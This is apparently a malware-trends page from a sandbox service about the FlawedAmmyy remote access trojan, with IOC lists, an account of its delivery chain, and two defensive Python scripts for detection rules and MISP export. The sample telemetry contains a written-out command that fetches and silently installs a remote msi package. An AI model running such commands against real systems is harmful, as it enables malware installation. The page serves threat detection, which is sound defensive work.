FlawedAmmyy

Global rank: 49
Month rank: 45
Week rank: 82
FlawedAmmyy is a RAT-type malware (Remote Access Trojan) that lets an attacker perform actions remotely on an infected PC. It is best known for appearing in especially large campaigns with a wide range of targets.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 31 October, 2020

How to analyze FlawedAmmyy with ANY.RUN


IOCs

IP addresses
136.243.104.235
136.243.104.242
179.60.146.3
160.119.253.219
45.227.252.54
146.0.77.62
169.239.129.54
169.239.128.186
185.99.133.83
185.99.132.12
169.239.129.45
169.239.128.36
169.239.128.15
169.239.128.185
169.239.129.113
169.239.129.103
169.239.129.27
185.99.133.140
185.99.132.119
209.239.123.75

Domains
majul.com
isns.net
hhihkonline.ooo


What is FlawedAmmyy malware?

FlawedAmmyy is a Remote Access Trojan, a type of malware that attackers use to take full control of a target machine. It is built from the source code of Ammyy Admin, a completely legitimate remote administration program. Although this RAT was first documented as new malware in 2018, some researchers believe it has been in use since 2016.

FlawedAmmyy has been used by multiple attackers both in massive email-spam campaigns and in highly targeted attacks against businesses in the automotive industry. Among others, the well-known threat actor group tracked as TA505 is known to have used this malware in large-scale campaigns.

General description of FlawedAmmyy malware

Because it is built from the leaked source code of version 3 of Ammyy Admin, a legitimate remote access and administration program, FlawedAmmyy gives attackers the same capabilities on an infected Windows PC: they can control the desktop remotely, manipulate files, steal credentials, and capture audio from the machine to collect information about their victims.

The popularity of FlawedAmmyy rose especially quickly in 2018, as some malicious actors shifted their focus from ransomware to other types of malware. In particular, in November 2018 the threat actor TA505 began distributing loaders through its spam email campaigns, first ServHelper and later AndroMut, with the end goal of infecting victims with FlawedAmmyy.

Researchers have detected two separate campaigns that distributed FlawedAmmyy through the AndroMut loader. The first targeted victims in South Korea with HTML attachments that downloaded an Office file containing malicious macros; the macros installed the loader, which in turn dropped the main payload, FlawedAmmyy RAT. Other AndroMut campaigns were broader in scope and hit enterprises in the USA, the UAE, and Singapore.

Other campaigns in 2019, not necessarily run by TA505, used a spreadsheet carrying a malicious Excel 4.0 (XLM) macro that downloaded FlawedAmmyy directly, skipping the loader stage.

FlawedAmmyy malware analysis

A video recorded in the ANY.RUN malware hunting service shows the execution process of FlawedAmmyy, allowing one to examine it in a convenient and safe environment.

Figure 1: The process graph generated by the ANY.RUN malware analysis service for a FlawedAmmyy sample

Figure 2: Even more information about the execution of the malware can be found in the customizable text reports generated by ANY.RUN

FlawedAmmyy execution process

FlawedAmmyy usually reaches the machine through spam email as a Microsoft Word or Excel document containing a malicious macro. Examples of such documents can be found in ANY.RUN's public submissions by browsing the tag maldoc-21. When the malicious .xls file is opened, its macro automatically launches either msiexec.exe or cmd.exe to download and execute the first-stage payload. That first-stage executable then downloads and decrypts another file, usually named "wsus.exe", which is the FlawedAmmyy malware itself. wsus.exe establishes persistence on the system and communicates with the C2 servers.

Some of the malicious executables are digitally signed with a valid certificate issued by a trusted certificate authority. A valid signature only proves that the binary has not been altered since it was signed; it says nothing about the signer's intent, so a "signed" status must not short-circuit detection. It is also notable that the trojan checks the user's privileges and the presence of anti-virus software on the infected machine and changes its behavior based on the result. You can also compare this execution method with those of Trickbot and Zloader.

Distribution of FlawedAmmyy RAT

FlawedAmmyy is distributed through spam email campaigns whose subjects usually concern invoices or receipts. The emails may carry a .zip attachment disguised as something related to the subject line, a Microsoft Office file, or an XML attachment. In reality, the attached file holds a URL that opens a browser window and redirects the victim to a website from which the malware sample is downloaded.

In some campaigns a loader, a separate piece of malware whose only job is to install the final payload, is downloaded first and then drops FlawedAmmyy onto the machine. Other campaigns fetched the malware directly over the Server Message Block (SMB) protocol, that is, from a remote file share on TCP port 445, bypassing the browser download entirely. This is a rare trick for malware, and outbound SMB from workstations to the internet is a strong signal worth blocking at the perimeter.
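The execution chain and the SMB download trick described above translate directly into detection logic. The following script is an added example, not ANY.RUN's own tooling: it runs a handful of rules over process, registry and network events of the kind a sandbox or EDR would emit. The telemetry is constructed for the example; the C2 addresses and the majul.com domain come from the IOC list on this page, and the use of a Run key for wsus.exe persistence is an assumption (the page says only that wsus.exe "establishes persistence").

```python
"""Detection rules for the FlawedAmmyy delivery chain.

Constructed sample telemetry (not real sandbox output) stands in for the
process, registry and network events an EDR or ANY.RUN task would produce.
Run-key persistence for wsus.exe is an assumption: the page only says that
wsus.exe "creates persistence", not how.
"""
import ipaddress
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children the maldoc macro is described as launching; powershell.exe is an
# assumption added to cover similar chains.
DOWNLOADERS = {"msiexec.exe", "cmd.exe", "powershell.exe"}
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
# Two C2 addresses taken from the IOC list on this page.
KNOWN_C2 = {"136.243.104.235", "185.99.133.83"}


def basename(path):
    return ntpath.basename(path).lower()


def is_external(ip):
    """True for routable addresses, i.e. SMB leaving the local network."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def analyze(events):
    """Return (rule_name, detail) tuples for every event that matches a rule."""
    findings = []
    for e in events:
        if e["type"] == "process":
            parent, child = basename(e["parent_image"]), basename(e["image"])
            cmd = e.get("command_line", "").lower()
            if parent in OFFICE_APPS and child in DOWNLOADERS:
                findings.append(("office_spawns_downloader", f"{parent} -> {child}: {cmd}"))
            # "msiexec /i <url>" installs a package fetched straight over HTTP(S).
            if child == "msiexec.exe" and "/i" in cmd.split() and "http" in cmd:
                findings.append(("remote_msi_install", cmd))
        elif e["type"] == "registry":
            if RUN_KEY in e["key"].lower() and basename(e["value_data"]) == "wsus.exe":
                findings.append(("run_key_persistence", e["value_data"]))
        elif e["type"] == "network":
            ip, port = e["dst_ip"], e["dst_port"]
            if port == 445 and is_external(ip):
                findings.append(("outbound_smb", f"{basename(e['image'])} -> {ip}:445"))
            if ip in KNOWN_C2:
                findings.append(("known_c2", f"{basename(e['image'])} -> {ip}:{port}"))
    return findings


EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
WSUS = r"C:\Users\victim\AppData\Local\Temp\wsus.exe"

# Constructed events; file paths and the .msi name are made up for the example.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": EXCEL, "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /i http://majul.com/update.msi /q"},
    {"type": "process", "parent_image": r"C:\Windows\System32\msiexec.exe", "image": WSUS,
     "command_line": "wsus.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "wsus", "value_data": WSUS},
    {"type": "network", "image": WSUS, "dst_ip": "136.243.104.235", "dst_port": 443},
    {"type": "network", "image": EXCEL, "dst_ip": "185.99.133.83", "dst_port": 445},
    # Benign noise: an interactive shell and internal SMB traffic should not fire.
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd /c dir"},
    {"type": "network", "image": r"C:\Windows\System32\svchost.exe", "dst_ip": "10.0.0.5", "dst_port": 445},
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:26} {detail}")
```

The Office-to-msiexec/cmd parent-child rule is the cheapest and most durable of the five: it keys on the macro's launch step rather than on any specific URL or filename, which operators change between campaigns.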

How to prevent FlawedAmmyy attacks?

Once FlawedAmmyy infects a PC, it can operate discreetly without giving the user any sign that the machine is infected. This lets attackers collect information about their victims over a long period and makes the malware potentially very destructive.

Following simple online safety rules makes avoiding infection fairly easy: a user who never clicks suspicious links or opens attachments from unknown senders is largely safe. Things get more complicated with FlawedAmmyy, however, because some of the attacks are highly targeted and use believable emails.

Users are therefore advised to verify the authenticity of an email and pay attention to small details before downloading files or following URLs in their correspondence.

How to export FlawedAmmyy data using ANY.RUN?

Analysts can export all significant events from a task to MISP for further analysis, for forwarding to IDS/SIEM systems, or simply to share them. Click the "Export" button and choose "MISP JSON format" in the drop-down menu.
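For the indicators listed on this page rather than a full task export, the same MISP JSON shape can be produced by hand. The script below is an added example and is not ANY.RUN's export code: it classifies each raw indicator into a MISP attribute type, deduplicates, sets to_ids so the values feed IDS/SIEM correlation, and wraps them in an event. The IOC values are the IP addresses and domains from this page; the event info text, tag name and distribution level are assumptions to adjust for your own instance.

```python
"""Build a MISP event from FlawedAmmyy indicators.

Added example; this is not ANY.RUN's export code.  The indicator values are
the IP addresses and domains listed on this page; the event metadata (info,
tag, distribution) are assumptions.
"""
import ipaddress
import json
import re

DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)
HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
CATEGORY = {"ip-dst": "Network activity", "domain": "Network activity",
            "md5": "Payload delivery", "sha1": "Payload delivery", "sha256": "Payload delivery"}


def classify(ioc):
    """Map a raw indicator string to a MISP attribute type, or raise ValueError."""
    try:
        ipaddress.ip_address(ioc)
        return "ip-dst"
    except ValueError:
        pass
    if re.fullmatch(r"[0-9a-fA-F]+", ioc) and len(ioc) in HASH_TYPES:
        return HASH_TYPES[len(ioc)]
    if DOMAIN_RE.match(ioc):
        return "domain"
    raise ValueError(f"unrecognised indicator: {ioc!r}")


def build_misp_event(info, iocs, tags=(), comment=""):
    """Return a dict in MISP's event JSON layout (Event -> Attribute list)."""
    seen, attributes = set(), []
    for raw in iocs:
        value = raw.strip()
        if not value or value in seen:
            continue  # skip blanks and duplicates
        seen.add(value)
        atype = classify(value)
        attributes.append({
            "type": atype,
            "category": CATEGORY[atype],
            "value": value,
            "to_ids": True,          # eligible for IDS/SIEM export
            "comment": comment,
        })
    return {"Event": {
        "info": info,
        "distribution": "0",         # 0 = your organisation only; raise deliberately
        "threat_level_id": "2",      # medium
        "analysis": "2",             # completed
        "Attribute": attributes,
        "Tag": [{"name": t} for t in tags],
    }}


# Indicators copied from the IOC list on this page.
PAGE_IOCS = [
    "136.243.104.235", "136.243.104.242", "179.60.146.3", "160.119.253.219",
    "45.227.252.54", "146.0.77.62", "169.239.129.54", "169.239.128.186",
    "185.99.133.83", "185.99.132.12", "169.239.129.45", "169.239.128.36",
    "169.239.128.15", "169.239.128.185", "169.239.129.113", "169.239.129.103",
    "169.239.129.27", "185.99.133.140", "185.99.132.119", "209.239.123.75",
    "majul.com", "isns.net", "hhihkonline.ooo",
]

if __name__ == "__main__":
    event = build_misp_event("FlawedAmmyy RAT indicators", PAGE_IOCS,
                             tags=("flawedammyy",), comment="from ANY.RUN malware trends page")
    print(json.dumps(event, indent=2))
```

The generated document can be pushed with the MISP REST API or imported through the web UI; keep distribution at 0 until the indicators have been reviewed, since to_ids attributes are exactly the ones that downstream sensors will start alerting on.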

Figure 3: Exporting the events of a FlawedAmmyy task into MISP JSON

Summary

FlawedAmmyy RAT is capable of operating stealthily on infected machines and causing serious damage through its remote access capabilities. It has appeared both in massive email spam campaigns and in targeted attacks against businesses in particular industries, which shows how varied the operators behind this malware are in choosing their victims.

Security researchers only documented this malware in 2018 despite its having been around since 2016, which means it operated undetected for two whole years, evading researchers or perhaps even misleading them. Modern malware analysis services like ANY.RUN provide purpose-built tools that simplify and streamline the research process and help identify current and future threats.
